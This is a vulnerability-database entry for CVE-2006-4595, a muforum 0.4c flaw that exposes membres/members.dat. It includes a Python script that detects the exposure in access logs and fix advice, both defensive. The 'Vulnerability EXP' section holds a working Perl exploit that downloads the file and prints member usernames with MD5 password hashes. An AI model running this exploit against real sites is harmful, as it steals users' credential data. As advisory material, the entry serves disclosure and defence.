muforum Sensitive Information Disclosure Vulnerability

Vulnerability ID: 1193593    Vulnerability type: Information disclosure
Published: 2006-09-06    Updated: 2007-01-24
CVE: CVE-2006-4595    CNNVD ID: CNNVD-200609-087
Platform: N/A    CVSS score: 5.0
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2006090042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-087
|Vulnerability Details
muforum (forum) 0.4c stores membres/members.dat under the web document root without adequate access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes.
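Because the file is served like any other static asset, a successful fetch of it leaves an ordinary 200 entry in the web server access log. The following detection script is an added example (not part of the advisory or of muforum); it assumes an Apache/nginx "combined" log format and flags successful requests for .dat files below membres/, using constructed sample log lines.

```python
import re

# Combined log format (assumed layout): ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# The advisory's sensitive file is membres/members.dat; the pattern generalises to
# any .dat file below membres/, since none of them should be browser-accessible.
SENSITIVE_PATH_RE = re.compile(r'/membres/[^?#]*\.dat$', re.IGNORECASE)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['bytes'] = 0 if rec['bytes'] == '-' else int(rec['bytes'])
    rec['path'] = rec['path'].split('?', 1)[0]   # drop any query string before matching
    return rec

def find_disclosures(lines):
    """Return (ip, path, status) for requests that actually received a sensitive .dat file.

    A 403/404 means the access control worked; only a 200 with a non-empty body is a disclosure.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if SENSITIVE_PATH_RE.search(rec['path']) and rec['status'] == 200 and rec['bytes'] > 0:
            hits.append((rec['ip'], rec['path'], rec['status']))
    return hits

# Constructed sample log lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Sep/2006:10:15:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla"',
    '203.0.113.5 - - [06/Sep/2006:10:15:07 +0000] "GET /forum/membres/members.dat HTTP/1.1" 200 844 "-" "Mozilla"',
    '198.51.100.9 - - [06/Sep/2006:10:16:00 +0000] "GET /forum/membres/members.dat HTTP/1.1" 403 212 "-" "Mozilla"',
    '198.51.100.9 - - [06/Sep/2006:10:16:30 +0000] "GET /forum/membres/avatar.png HTTP/1.1" 200 3010 "-" "Mozilla"',
]

if __name__ == '__main__':
    for ip, path, status in find_disclosures(SAMPLE_LOG):
        print(f'possible members.dat disclosure: {ip} fetched {path} ({status})')
```

Any hit here is evidence that the web server is still serving the member store; the fix is to deny web access to membres/members.dat (or move it outside the document root) and to treat the hashes it held as exposed.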
|Vulnerability EXP
#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in a .dat file not protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";

# Command-line options: target host, forum path, optional HTTP proxy and proxy credentials
my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
    'host=s'   =>  \$host,
    'path=s'   =>  \$path,
    'proxh=s'  =>  \$proxh,
    'proxu=s'  =>  \$proxu,
    'proxp=s'  =>  \$proxp);

if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host  !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $res = $ua->request($req);
my $dat = $res->content;

# Split the file on ':' and print each quoted name followed by ';a' and
# each quoted 32-character hash followed by ';i' as name::hash
my @tabl= split(/:/, $dat);
foreach (@tabl) {
    if($_ =~ /"(.*)";a/){
        print "\n".$1.'::';}
    if($_ =~ /"([a-z0-9]{32})";i/){
        print $1;}
}
print "\n";
exit(0);
|References

Source: BUGTRAQ
Name: 20060901 µforum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc
Link: http://www.securityfocus.com/archive/1/archive/1/445001/100/0/threaded
Source: VUPEN
Name: ADV-2006-3445
Link: http://www.frsirt.com/english/advisories/2006/3445
Source: SREASON
Name: 1514
Link: http://securityreason.com/securityalert/1514
Source: SECUNIA
Name: 21742
Link: http://secunia.com/advisories/21742
Source: MISC
Link: http://acid-root.new.fr/poc/08060901.txt